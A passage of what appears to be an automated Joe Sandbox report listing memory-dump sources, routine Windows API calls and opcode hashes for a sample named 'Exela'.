                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CreateDirectoryMessage
                                                                                                                                                                                                                                                            • String ID: Security descriptor is not initialized!
                                                                                                                                                                                                                                                            • API String ID: 73271072-986317556
                                                                                                                                                                                                                                                            • Opcode ID: c8cf0510d3cf58293c8056e04266fc05212419b77e6f78cec61fc6e6c2a7edb1
                                                                                                                                                                                                                                                            • Instruction ID: 7cb4afff0aa05b9826bf1af103a56b213faeaa8b5aeeac908a75d570bec0a65b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c8cf0510d3cf58293c8056e04266fc05212419b77e6f78cec61fc6e6c2a7edb1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 60E09B73B2874685EA109B1CE4463697650BB51354F801334E14CE73D4DF3DD1858B04
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                                            • Opcode ID: b54b3d0524db6e35a6be9399f4168b0f839baac618e96e940c4dc5df63f75cb8
                                                                                                                                                                                                                                                            • Instruction ID: 3be0218f7c4cf4cd3b5edbd3180e0474a504879f9240aed5d26249404e16cfab
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b54b3d0524db6e35a6be9399f4168b0f839baac618e96e940c4dc5df63f75cb8
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7651F863B0928186FA24DA3D948277A6B91BF44BA4F044730DDAD977CDCE3ED480860A
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF6E3A7B579,?,?,00000000,00007FF6E3A7B62E), ref: 00007FF6E3A7B76A
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF6E3A7B579,?,?,00000000,00007FF6E3A7B62E), ref: 00007FF6E3A7B774
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ChangeCloseErrorFindLastNotification
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1687624791-0
                                                                                                                                                                                                                                                            • Opcode ID: e3b73f063bb60367d817196ec2a4f8f6eb52bee7e7896c4ceb0739ce7562b917
                                                                                                                                                                                                                                                            • Instruction ID: 51d6223d77f5a14dd1ff1696ec0c0adb4486b267cdf9c710f6c38bcb537d7be5
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e3b73f063bb60367d817196ec2a4f8f6eb52bee7e7896c4ceb0739ce7562b917
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A5210893F0968241FE50532CE4D73BD1A825F857A0F184234DA2EE73D9CE6EE8C0830A
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2976181284-0
                                                                                                                                                                                                                                                            • Opcode ID: 62a26f8d1512d31d847f2a475d98554d5a752059faf1bb854899a2cf804e20f8
                                                                                                                                                                                                                                                            • Instruction ID: 6ba68cc93cffc0518588929ccdf63b304376bc11eefb0c115dac969e3c93cc13
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 62a26f8d1512d31d847f2a475d98554d5a752059faf1bb854899a2cf804e20f8
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3611BF62B08B8181DA108B29B885269AB61AB84FF4F580331EA7D977D9CE3DD4908746
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6E3A75EF1), ref: 00007FF6E3A7600F
                                                                                                                                                                                                                                                            • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6E3A75EF1), ref: 00007FF6E3A76025
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1707611234-0
                                                                                                                                                                                                                                                            • Opcode ID: 32438027c896fc9b7cfa90544aa36bc1c4b0d83a992ad2bd2587f4ad36304ad4
                                                                                                                                                                                                                                                            • Instruction ID: 0696d51dd3deb1d3e6b3f6425ec6ea57179e87d3bf6aba090ad8e79c0b0b827e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 32438027c896fc9b7cfa90544aa36bc1c4b0d83a992ad2bd2587f4ad36304ad4
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D711917370C64281EB548B19A45223EBB60FB84761F514235F69ED29E8EF2ED095CB05
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6E3A78519), ref: 00007FF6E3A786BF
                                                                                                                                                                                                                                                            • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6E3A78519), ref: 00007FF6E3A786D5
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1707611234-0
                                                                                                                                                                                                                                                            • Opcode ID: c01ff3a2a11960581671d504f9b8c47b5ef938e1e8c71af115ecd984c59071e9
                                                                                                                                                                                                                                                            • Instruction ID: 2b42f271bf8d73f4d414d86f889027922c9069b1850099a7a8902fe15451357a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c01ff3a2a11960581671d504f9b8c47b5ef938e1e8c71af115ecd984c59071e9
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 39018223A0C65182E7549F19A44637EBBA1FB81761F600235E6A9919D8EF3ED090CB05
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF6E3A83972,?,?,?,00007FF6E3A839AF,?,?,00000000,00007FF6E3A83E75,?,?,00000000,00007FF6E3A83DA7), ref: 00007FF6E3A7B502
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF6E3A83972,?,?,?,00007FF6E3A839AF,?,?,00000000,00007FF6E3A83E75,?,?,00000000,00007FF6E3A83DA7), ref: 00007FF6E3A7B50C
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorLanguagesLastPreferredRestoreThread
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 588628887-0
                                                                                                                                                                                                                                                            • Opcode ID: c6b9e98d984d24e8bfd8e8ff83776c8447130b112ec08e9122362d67c2677dc5
                                                                                                                                                                                                                                                            • Instruction ID: af79109f6b9b9405568cfa80ffd82815ff79387e049488905fc0242b846503e9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c6b9e98d984d24e8bfd8e8ff83776c8447130b112ec08e9122362d67c2677dc5
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0CE08693F0924242FF186BB994CB2751B619F88741F444034D80EE6295EE3E68D5470A
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DeleteErrorFileLast
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2018770650-0
                                                                                                                                                                                                                                                            • Opcode ID: 94f9cb437eb1ff87f9bc785627a082ceb46c643cc627e045b1becda1a3c124ee
                                                                                                                                                                                                                                                            • Instruction ID: a035b7accc96157a13937dd32506f940c1c93c4e117772c0e3996cbb28be3f85
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 94f9cb437eb1ff87f9bc785627a082ceb46c643cc627e045b1becda1a3c124ee
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D9D0C912F2A54382F61837BE1C8F23919A46F84721F500630C019E11D4EE2EA1C50A4B
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DirectoryErrorLastRemove
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 377330604-0
                                                                                                                                                                                                                                                            • Opcode ID: 25cba87855c0571564d380caaddad194b65a7b1ee83bb0c7e49656b6643110b8
                                                                                                                                                                                                                                                            • Instruction ID: 8d2449defac2cfd4215f8121e32bd11ebfecdfc8773856804e20360c3c312e6e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 25cba87855c0571564d380caaddad194b65a7b1ee83bb0c7e49656b6643110b8
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 14D0C916F1D54382F65837B918CB33919A45F64721F500630C419E01E5EE5EA0C5170B
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6E3A68BD0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6E3A62A9B), ref: 00007FF6E3A68C0A
                                                                                                                                                                                                                                                            • _findclose.LIBCMT ref: 00007FF6E3A67F99
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide_findclose
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2772937645-0
                                                                                                                                                                                                                                                            • Opcode ID: 48f146a0b58ba69d35d10fb74dcf7020fe44260969c36ff7d18f8529940cc898
                                                                                                                                                                                                                                                            • Instruction ID: 32942c6788761452422d03bb448c00983e2630c62e5ceb45e9ccafa5d0245fb1
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 48f146a0b58ba69d35d10fb74dcf7020fe44260969c36ff7d18f8529940cc898
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5D71CE53E28AC581E610CB2CC5063FD7360F7A8B48F54E321CB9D62592EF2AE2C9C304
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                                            • Opcode ID: 9bd69e230f0d3b0e5758ab1338c67e81032152045ba6d69f05b41d5745cc01d1
                                                                                                                                                                                                                                                            • Instruction ID: fa0b70160c37c9b9a0904e1e5342ee49dd027dd508fe76c5b5684c08ba3f70d0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9bd69e230f0d3b0e5758ab1338c67e81032152045ba6d69f05b41d5745cc01d1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C141B733B0824187EA24DB2DA5823797BA1EB55B51F100131E68EE36D9CF2EE482C756
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _fread_nolock
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 840049012-0
                                                                                                                                                                                                                                                            • Opcode ID: 74e55369d5d94215d6d8331dab949902abf0a56bc99a5b7e0c119ac4b97a7665
                                                                                                                                                                                                                                                            • Instruction ID: 7eb4ad7317645743fdf1a79fd4a606b49f9791e4b7f433f7a1fa262679714117
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 74e55369d5d94215d6d8331dab949902abf0a56bc99a5b7e0c119ac4b97a7665
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1421EA63B1835146FA109B1E69467FABA59BF85BC4F8C4030EE0D97786CE7EE081C709
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                                            • Opcode ID: b8e14b5e39437f3a23779871e591f8317b8e1be46d6eca35f9beed21127490c6
                                                                                                                                                                                                                                                            • Instruction ID: 4b50d078dd95311decbef93b3c1494f4260f32b796e2210d84ddf14d25861f95
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b8e14b5e39437f3a23779871e591f8317b8e1be46d6eca35f9beed21127490c6
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E9318063F1864286E615AB5D88C73792F60AF40B94F410235EA1DA73D6CE7FE4C1871A
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
